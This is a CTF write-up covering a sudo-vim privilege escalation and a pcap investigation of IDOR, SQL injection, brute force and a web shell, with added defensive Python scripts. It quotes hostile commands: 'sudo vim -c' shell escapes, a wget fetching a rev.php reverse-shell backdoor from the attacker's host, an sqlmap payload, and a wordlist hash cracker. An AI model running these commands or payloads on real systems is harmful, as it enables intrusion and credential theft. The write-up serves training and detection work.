Hello hackers, today I want to share some write-ups from the UDOM X-MASS CTF, which was organised by my fellow mentors here at our university. The CTF was a 24-hour, jeopardy-style (and easy) CTF, run from 22/12/2023 to 23/12/2023. So let's solve the CTF.
Let the hack begin and let's enjoy the struggle.
Flag format: UDOM{xxxxxxxxxxxxxx}
PART 1: LINUX
We got two challenges.
1. CHALLENGE 1 (Secure Shell)
As you can see below, the challenge needs us to log in via SSH and grab the user.txt file. We are given a username and a password, but the password is hashed, so the first task is to crack the hash (piece of cake).
hash: 1da233e7b6e0fe081e0a383e98b5b758ad0f3f4c9471d980796745fafc67beab6f8e5761e26d5e73699f39bf96ee156e
Cracking this was very simple: just paste the hash into an online lookup (Google it, and Google will tell you what to do, simple as that).
password (plaintext): un1qu3m3
Now we log in via SSH.
flag: UDOM{n07_alwa7s_3asy_as_1t_s33ms_SHA-384:un1qu3m3}
2. CHALLENGE 2 (Privilege Escalation)
Time for privilege escalation. This one didn't require much energy; GTFOBins was enough to solve it.
First of all, run sudo -l and you will observe some cool information. If it prompts you for a password, input the password we got earlier.
From the above we can see that, first of all, they are using a Docker container to host this machine, and there is the Docker ID (c1dd26ec86c2). Really fun, but let's skip Docker since it's not part of this CTF. The other, more interesting thing is the /usr/bin/vim binary.
Explanation: we all know vim is a text editor on Unix. What comes into play here is that sudo lets us run this binary as the superuser, and vim does not drop the elevated privilege when it runs a command for us.
We can prove this with:
command: ls -la /usr/bin/vim
The most important thing here is the -c argument (execute <command>, really fun, man).
And from here we can check whether /bin/bash has root permission before we execute it via vim.
Generally, the exploitation looks like this to get root access:
command: sudo vim -c '!/bin/sh'
FLAG: UDOM{Y0u'r3_n0w_g01ng_7o_B3_th3_M4st3r_0f_h4ck1ng_mach1n35}
BONUS
NB: since we saw that sudo can also run vim, we can open a file (any file name of your choice) with vim, but attached to sudo.
i.e. sudo vim memes_for_fun
Inside the file you can type anything, and before saving the file we execute the command "!/bin/bash" and we get root.
NB: Don't just claim it; you have to understand how things flow and how things work. Happy hacking.
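The lesson of this challenge and the bonus is the same one a defender should take from GTFOBins: a sudo rule for an editor or pager is a sudo rule for a root shell, because those programs run sub-commands by design. The script below, added here as an example (it is not from the CTF and not the organisers' code), parses the rules section of `sudo -l` output and flags commands that grant a shell that way. The `sudo -l` text is constructed: the host name is the Docker ID the write-up mentions, while the user name `ctfuser` and the second rule are made up.

```python
import os
import re

# Binaries whose normal function includes running a sub-command or opening a shell,
# so a sudo rule for them is equivalent to a rule for a root shell (vim's ":!" and
# "-c" escapes, which the write-up uses, are the classic case).  Constructed list
# for this example; GTFOBins carries the full catalogue.
SHELL_ESCAPE_BINARIES = {"vim", "vi", "vim.basic", "nano", "less", "more", "man", "find"}

# Constructed `sudo -l` output modelled on the write-up's box: the host name is the
# container id from the page, the user name and the second rule are made up.
SAMPLE_SUDO_L = """\
Matching Defaults entries for ctfuser on c1dd26ec86c2:
    env_reset, mail_badpass

User ctfuser may run the following commands on c1dd26ec86c2:
    (ALL) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/systemctl status nginx
"""

# One rule line: "(runas) TAG: TAG: command, command"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")


def parse_sudo_l(text):
    """Return (runas, tags, command) tuples from the rules section of `sudo -l` output."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True          # everything after this header is a rule line
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.rstrip(":") for t in m.group("tags").split()]
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas").strip(), tags, cmd.strip()))
    return rules


def audit_sudo_rules(text):
    """Flag rules that amount to a root shell: ALL, or a binary with a shell escape."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(text):
        nopasswd = "NOPASSWD" in tags
        if cmd == "ALL":
            findings.append({"command": cmd, "runas": runas, "nopasswd": nopasswd,
                             "reason": "unrestricted sudo"})
            continue
        binary = os.path.basename(cmd.split()[0])
        if binary in SHELL_ESCAPE_BINARIES:
            findings.append({"command": cmd, "runas": runas, "nopasswd": nopasswd,
                             "reason": f"{binary} can run a sub-shell, so this rule grants a {runas} shell"})
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_rules(SAMPLE_SUDO_L):
        print(finding)
```

Run it against real `sudo -l` output piped in from each host you manage. The fix on the sudoers side is to grant `sudoedit /path/to/file` instead of a general `vim` rule, or to attach sudo's `NOEXEC:` tag to the rule so the editor cannot spawn a child shell.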
PART 2: NETWORK FORENSICS
These challenges were simple but interesting, because you need to solve one challenge to unlock the next, up to the final challenge (13 challenges in total).
NB: the idea behind this challenge set is mostly for blue teamers, who are responsible for monitoring other people's activities, so I really enjoyed it.
1. CHALLENGE (IP)
I have already downloaded the file and unzipped it, so let's check for the flag.
If you check the statistics you will observe that the flag is
UDOM{192.168.1.7_192.168.1.5}
2. CHALLENGE 2 (Domain)
Let's go back to our pcap file and input "http" as a filter in the filter bar.
After that I searched for the packet whose Info contains the 200 OK status code and clicked Follow TCP Stream.
At the top of the HTTP headers we get Host: nanomate-solutions.com
flag: UDOM{nanomate-solutions.com}
3. CHALLENGE 3 (Vulnerability)
The main aim was to find the type of attack the attacker managed to exploit, so let's search through the pcap file.
NB: since we were given a hint, we have somewhere to begin our investigation into which vulnerabilities the attacker managed to exploit here.
The hint was: "The page process_task_details.php had two vulnerabilities that were exploitable… What are they in their short form??"
Now we go to Wireshark as usual, input "http" as the filter and search for the string "process_task_details.php". This narrows the packets down to the requests and responses that contain that string.
From there we click the first result and follow the TCP stream.
While viewing the stream I saw the id was changing, which is probably an IDOR vulnerability, so I kept looking.
I also saw XSS, but I think he was just testing via the id parameter to see if he could exploit it; the bad thing for him is that it didn't work.
And finally I saw SQL injection, from the input the attacker submitted (') and the response he got from the server (Internal Server Error), which worked here.
flag: UDOM{IDOR_SQLi}
4. CHALLENGE 4 (IDOR)
IDOR stands for Insecure Direct Object Reference, where the attacker can simply change the ID parameter and see other people's information without authorisation.
Here we need to check the id parameter and see which id gave us these results.
Looking at one id after another, I came across id parameter number 8, which gave the results he requested.
flag: UDOM{8}
5. CHALLENGE 5 (SQLi)
Since we know the attacker managed to exploit SQLi and IDOR, let's see how he managed to exploit the SQLi.
The first thing the attacker did was test whether SQL injection was possible by submitting ('), which worked for him:
he got an internal error. From here he decided to use the sqlmap tool to automate the SQL injection attack, and while following the stream I saw this one.
So from here we get our flag.
flag: UDOM{sqlmap/1.6.10#stable}
6. CHALLENGE 6 (Payload)
In this challenge we need to find which payload worked for the attacker and how he managed to get the admin (root) credentials.
NB: sqlmap is a very interesting tool. From experience, since the challenge asks for the admin or root creds, we need to find the payload that contains something like "admin", whether as a username, a database or a column name; what I know is that it must contain something like admin.
Now we have the payload, but it is encoded, so let's decode it. I will use CyberChef here.
flag:UDOM{11…FROM nanomate_solutions_db.admin– -}
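Challenges 3 to 6 all come down to reading the same HTTP stream and recognising three behaviours in the requests to process_task_details.php: an id that walks through values (IDOR), a script tag in the parameter (XSS probe), and a quote that produces a server error followed by sqlmap's User-Agent (SQLi). The script below, added here as an example (not from the CTF and not the organisers' code), runs that recognition over a constructed set of request records, URL-decoding the parameters first, which is the step the write-up does by hand in CyberChef. The host, page name, client address and sqlmap version are from the page; the parameter values and the `IDOR_THRESHOLD` are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

IDOR_THRESHOLD = 3    # distinct ids one client walks through before we call it enumeration (constructed)
SCRIPT_TAG = re.compile(r"<\s*script", re.IGNORECASE)

# Constructed request records modelled on the http.request packets the write-up
# follows: (client ip, request target, User-Agent header, HTTP status of the reply).
# Host, page, client address and the sqlmap version come from the page; the parameter
# values are made up for the example.
SAMPLE_REQUESTS = [
    ("192.168.1.7", "/process_task_details.php?id=3", "Mozilla/5.0", 200),
    ("192.168.1.7", "/process_task_details.php?id=4", "Mozilla/5.0", 200),
    ("192.168.1.7", "/process_task_details.php?id=5", "Mozilla/5.0", 200),
    ("192.168.1.7", "/process_task_details.php?id=8", "Mozilla/5.0", 200),
    ("192.168.1.7", "/process_task_details.php?id=%3Cscript%3Ealert(1)%3C%2Fscript%3E", "Mozilla/5.0", 200),
    ("192.168.1.7", "/process_task_details.php?id=8%27", "Mozilla/5.0", 500),
    ("192.168.1.7", "/process_task_details.php?id=8", "sqlmap/1.6.10#stable (https://sqlmap.org)", 200),
    ("192.168.1.5", "/index.php", "Mozilla/5.0", 200),
]


def request_params(target):
    """Split a request target into (path, {param: first decoded value}).
    parse_qs URL-decodes the values, the step the write-up does in CyberChef."""
    parts = urlsplit(target)
    return parts.path, {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}


def classify_requests(records):
    """Return (finding, client, detail) tuples in the order the evidence appears."""
    findings = []
    ids_seen = {}     # (client, path) -> distinct numeric ids requested so far
    for client, target, user_agent, status in records:
        path, params = request_params(target)
        if user_agent.lower().startswith("sqlmap"):
            # the first token is the tool and version string the write-up reports as the flag
            findings.append(("sqlmap_user_agent", client, user_agent.split()[0]))
        for name, value in params.items():
            if SCRIPT_TAG.search(value):
                # a probe only: whether it fired is not visible from the request itself
                findings.append(("xss_probe", client, f"{path}?{name}"))
            if "'" in value and status >= 500:
                # quote in the input plus a server error is the error-based SQLi signal
                findings.append(("sqli_error", client, f"{path}?{name}={value}"))
            if name == "id" and value.isdigit():
                seen = ids_seen.setdefault((client, path), [])
                if value not in seen:
                    seen.append(value)
                    if len(seen) == IDOR_THRESHOLD:
                        findings.append(("idor_enumeration", client, f"{path} ids {','.join(seen)}"))
    return findings


if __name__ == "__main__":
    for finding in classify_requests(SAMPLE_REQUESTS):
        print(finding)
```

The same rules translate directly into Wireshark display filters or WAF signatures; the server-side fix for the two vulnerabilities the flag names is an authorisation check on the id before the lookup, and parameterised queries instead of string concatenation.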
7. CHALLENGE 7
We need to find the type of attack, and also the email and password the attacker managed to use to log in as a normal user.
After moving around and finding many invalid login attempts, I realised that the attacker was probably brute-forcing the login page.
If we take a close look, the creds are encoded in some way; we can either decode them with a tool or ignore the encoding by removing it manually.
FLAG:UDOM{Brute_Force_Attack_tareq@gmail.com_tareq@nanomate}
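What the write-up spots by scrolling, a burst of rejected logins from one client followed by a success, is exactly what a login-monitoring rule automates. The script below is an added example (not from the CTF and not the organisers' code): it URL-decodes the form bodies, counts failures per client inside a time window, and records the first credential pair that succeeds for a flagged client. The events are constructed; the email and password are the ones the page reports in the flag, while the wrong guesses, the timings and the threshold are made up.

```python
from collections import defaultdict
from urllib.parse import parse_qs

FAILURE_THRESHOLD = 5    # failed attempts from one client inside the window (constructed)
WINDOW_SECONDS = 60.0

# Constructed login events modelled on the POSTs the write-up follows in Wireshark:
# (time of the request in seconds, client ip, URL-encoded form body, server outcome).
# The credential pair is the one the page reports; the wrong guesses are made up.
SAMPLE_LOGINS = [
    (100.0, "192.168.1.7", "email=tareq%40gmail.com&password=123456", "invalid"),
    (101.0, "192.168.1.7", "email=tareq%40gmail.com&password=password", "invalid"),
    (102.0, "192.168.1.7", "email=tareq%40gmail.com&password=tareq", "invalid"),
    (103.0, "192.168.1.7", "email=tareq%40gmail.com&password=tareq123", "invalid"),
    (104.0, "192.168.1.7", "email=tareq%40gmail.com&password=nanomate", "invalid"),
    (105.0, "192.168.1.7", "email=tareq%40gmail.com&password=letmein", "invalid"),
    (106.0, "192.168.1.7", "email=tareq%40gmail.com&password=tareq%40nanomate", "ok"),
    (300.0, "192.168.1.5", "email=alice%40example.com&password=wrongonce", "invalid"),
    (301.0, "192.168.1.5", "email=alice%40example.com&password=correct-horse", "ok"),
]


def decode_form(body):
    """URL-decode a form body (what the write-up does by hand); first value per field."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def detect_brute_force(events):
    """Return {client: summary} for clients that exceed FAILURE_THRESHOLD in WINDOW_SECONDS."""
    failures = defaultdict(list)     # client -> timestamps of every failed attempt
    flagged = {}
    for ts, client, body, outcome in sorted(events):
        fields = decode_form(body)
        if outcome != "ok":
            failures[client].append(ts)
            in_window = [t for t in failures[client] if ts - t <= WINDOW_SECONDS]
            if len(in_window) >= FAILURE_THRESHOLD and client not in flagged:
                flagged[client] = {"first_failure": in_window[0], "failures": 0,
                                   "targets": set(), "success": None}
            if client in flagged:
                flagged[client]["targets"].add(fields.get("email", ""))
        elif client in flagged and flagged[client]["success"] is None:
            # first successful login after the burst: the credential the attacker now holds
            flagged[client]["success"] = (fields.get("email"), fields.get("password"), ts)
    for client, entry in flagged.items():
        entry["failures"] = len(failures[client])
    return flagged


if __name__ == "__main__":
    for client, entry in detect_brute_force(SAMPLE_LOGINS).items():
        print(client, entry)
```

The success after a burst is the part worth alerting on, because it is the moment the account is actually compromised; on the application side, rate limiting and account lockout on the login endpoint remove the signal altogether.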
8. CHALLENGE 8 (Root)
This challenge needs us to recall how the attacker used the SQL injection payload to retrieve the root or admin creds in task 6.
At the bottom we get some information about the root user:
location: Bangladesh
email: root@nanomate-solutions.com
password_hash: 41528ac7f116e9661cf57be7cd79e1a2
FLAG:UDOM{root@nanomate-solutions.com_41528ac7f116e9661cf57be7cd79e1a2}
9. CHALLENGE 9 (Crack)
Since we have the hash, we need to crack it. Let's use simple online tools.
hash: 41528ac7f116e9661cf57be7cd79e1a2
password: y0u_cR4cK3d_m3
FLAG: UDOM{y0u_cR4cK3d_m3}
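Both hash challenges (the SSH password in Part 1, challenge 1, and the root password hash here) are solved by the same two steps that an online lookup hides: guess the algorithm from the digest length (96 hex characters is 384 bits, 32 is 128 bits) and compare the digest of each candidate password. The script below is an added example (not from the CTF and not the organisers' code) that does both offline with `hashlib`. The two hashes are the page's; the candidate wordlist is constructed, and the names `identify_by_length`, `digest_of` and `crack_with_wordlist` are mine.

```python
import hashlib

# Digest length in hex characters -> algorithms that produce it (constructed table;
# hashlib.new() accepts all of these names on a normal Python build).
LENGTH_TO_ALGOS = {
    32: ["md5"],
    40: ["sha1"],
    64: ["sha256", "sha3_256"],
    96: ["sha384", "sha3_384"],
    128: ["sha512", "sha3_512"],
}

# The two hashes the write-up cracks (values from the page).
PAGE_HASHES = {
    "ssh_password": "1da233e7b6e0fe081e0a383e98b5b758ad0f3f4c9471d980796745fafc67beab6f8e5761e26d5e73699f39bf96ee156e",
    "root_password_hash": "41528ac7f116e9661cf57be7cd79e1a2",
}

# Constructed candidate list; a real audit would use a password dictionary.
SAMPLE_WORDLIST = ["password", "123456", "un1qu3m3", "y0u_cR4cK3d_m3"]


def identify_by_length(hexdigest):
    """Candidate algorithms for a hex digest, judged only by its length."""
    if not hexdigest or any(c not in "0123456789abcdefABCDEF" for c in hexdigest):
        return []
    return list(LENGTH_TO_ALGOS.get(len(hexdigest), []))


def digest_of(algo, text):
    """Hex digest of `text` under `algo`, unsalted, as these CTF hashes were."""
    return hashlib.new(algo, text.encode()).hexdigest()


def crack_with_wordlist(hexdigest, wordlist):
    """Return (algorithm, plaintext) for the first candidate whose digest matches, else None."""
    target = hexdigest.lower()
    for algo in identify_by_length(target):
        for word in wordlist:
            if digest_of(algo, word) == target:
                return algo, word
    return None


if __name__ == "__main__":
    for label, value in PAGE_HASHES.items():
        print(label, identify_by_length(value), crack_with_wordlist(value, SAMPLE_WORDLIST))
```

The caveat for the application owner is that the digest length did not matter: an unsalted, fast hash of a short password falls to a lookup table whether it is MD5 or SHA-384. Passwords belong in a slow, salted scheme such as bcrypt or Argon2, where the same candidate check costs the attacker real time per guess.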
10. CHALLENGE 10 (Database)
From the description we see the challenge says "database", but the flag format says (flag_you_found), which means there is a database named flag. Let's go and get it.
FLAG: UDOM{Dev3L0peR_sH0uLD_n3veR_TrusT_uSer_InPuT}
11. CHALLENGE 11 (Reverse Shell)
NB: the hint was enough to get this challenge's flag, and enough to solve the rest of the remaining challenges.
The first thing I did was go to Wireshark and search for the string terminal.php.
After the attacker identified the vulnerable parameter (cmd), which allowed him to run commands, you can see below that the attacker ran the ls command.
The results (output) can be found at the bottom, where we can see that the command executed successfully.
After identifying that, the attacker tried to work out how to get a reverse shell (via bash, wget, python, python3 and so on). He started with a bash command, but it didn't work. He then tried to find out which Python version the server was using, with the which command, and that didn't work for him either. He tried to inject the python3 backdoor, which also didn't work, so he downloaded rev.php, the PHP backdoor, from his own machine using the wget command. If it were me, at this point I would know where to trigger rev.php so as to get a shell back to my computer.
Now we can take our flag and decode it with CyberChef.
FLAG: UDOM{cmd=wget http://192.168.1.7:8000/rev.php}
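The sequence the write-up reconstructs by hand (recon with ls, an interpreter attempt, tool discovery with which, then a wget of rev.php from the attacker's own host) is the sequence a reviewer of web-server logs or an IDS wants to recognise in a web shell's cmd parameter. The script below is an added example (not from the CTF and not the organisers' code): it URL-decodes each query string, classifies the program being run, and extracts the host and file of any remote fetch, which is the pivot for blocking the attacker's infrastructure. The last query is the page's flag value URL-encoded; the other three are constructed but follow the order the write-up describes, and the command families are my assumption.

```python
from posixpath import basename
from urllib.parse import parse_qs, urlsplit

# Command families worth flagging in a web shell's cmd parameter (constructed, based on
# the commands the write-up sees the attacker try against terminal.php).
RECON = {"ls", "id", "whoami", "pwd", "uname", "which"}
FETCH = {"wget", "curl"}
INTERPRETERS = {"bash", "sh", "python", "python3", "php"}

# Constructed query strings as they would appear in the requests to terminal.php; the
# last one is the page's flag value URL-encoded, the others are made up.
SAMPLE_CMD_QUERIES = [
    "cmd=ls",
    "cmd=bash",
    "cmd=which%20python3",
    "cmd=wget%20http%3A%2F%2F192.168.1.7%3A8000%2Frev.php",
]


def classify_shell_commands(queries):
    """One dict per query: the decoded command, its program, a category, and for
    remote fetches the host and file name requested."""
    findings = []
    for query in queries:
        fields = parse_qs(query, keep_blank_values=True)
        command = fields.get("cmd", [""])[0]     # parse_qs has already URL-decoded it
        words = command.split()
        if not words:
            continue
        program = basename(words[0])
        entry = {"command": command, "program": program, "category": "other"}
        if program in FETCH:
            entry["category"] = "remote_fetch"
            urls = [w for w in words[1:] if w.startswith(("http://", "https://"))]
            if urls:
                parts = urlsplit(urls[0])
                entry["netloc"] = parts.netloc          # where the payload was served from
                entry["file"] = basename(parts.path)    # what was dropped on the server
        elif program in INTERPRETERS:
            entry["category"] = "interpreter"
        elif program in RECON:
            entry["category"] = "recon"
        findings.append(entry)
    return findings


def attacker_hosts(findings):
    """Hosts the compromised server was told to fetch from; feed these to firewall/IDS rules."""
    return sorted({f["netloc"] for f in findings if f.get("netloc")})


if __name__ == "__main__":
    found = classify_shell_commands(SAMPLE_CMD_QUERIES)
    for entry in found:
        print(entry)
    print("attacker hosts:", attacker_hosts(found))
```

Notice that the fetch host is the same 192.168.1.7 that challenge 1 identified from the conversation statistics, so the two findings corroborate each other; the egress connection from the web server to that host on port 8000 is also the network event that a default-deny outbound policy would have blocked.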
12. CHALLENGE 12 (Priv Escalation)
This challenge was very easy to solve, because you just need to find where the attacker triggered his reverse shell (rev.php) and what he did for a foothold to get root. Really very easy.
FLAG:UDOM{sudo vim -c ':!/bin/sh'}
And another easy challenge was this one, just a free flag, man.
For this challenge you just need to scroll to the bottom and see what the attacker did; if you look closer you will find the flag.
FLAG: UDOM{Y0u_NaILeD_IT_HaCkEr}
NB: I AM GOING TO UPDATE THIS WRITE-UP DAY AFTER DAY TO COVER ALL THE CHALLENGES WHEN I GET BORED, SO YOU WILL FIND UPDATES HERE. ENJOY IT.